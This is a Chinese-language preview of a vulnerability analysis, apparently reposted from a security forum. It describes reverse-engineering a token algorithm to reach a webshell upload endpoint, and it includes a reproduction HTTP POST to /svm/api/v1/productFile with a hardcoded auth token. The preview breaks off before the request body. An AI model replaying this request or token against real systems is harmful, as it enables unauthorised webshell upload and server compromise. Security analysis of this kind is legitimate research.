文章预览
文章来源:奇安信攻防社区 作者:zhizhuo 链接:https://forum.butian.net/share/3085 通过某些渠道拿到一些漏洞情报,直接打开idea完整的跟一下给他卷出来,简单的讲述一下整个分析的过程以及漏洞触发的流程 漏洞细节 通过情报直接获取到一点点细节,那就直接开始看过程 直接可以上传webshell,但是这里有一个Token鉴权 我们需要看这个Token的生成算法 对应的是so文件,需要我们ida逆向分析 直接看sub_35690函数即可, 这里主要看v8大于等于0的函数即可,这里我就懒得看了 复现 数据包 POST /svm/api/v1/productFile?type=product =127.0.0.1 =1 HTTP/1.1 Host: Token: SElLIElnVTBzNVd6eWlibVB4M046dUE0SlBBbGJTWGNMUnk5aWg4dkJXL2RjeEdqKys4aTd0cHBMM09INytVZz0= Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
………………………………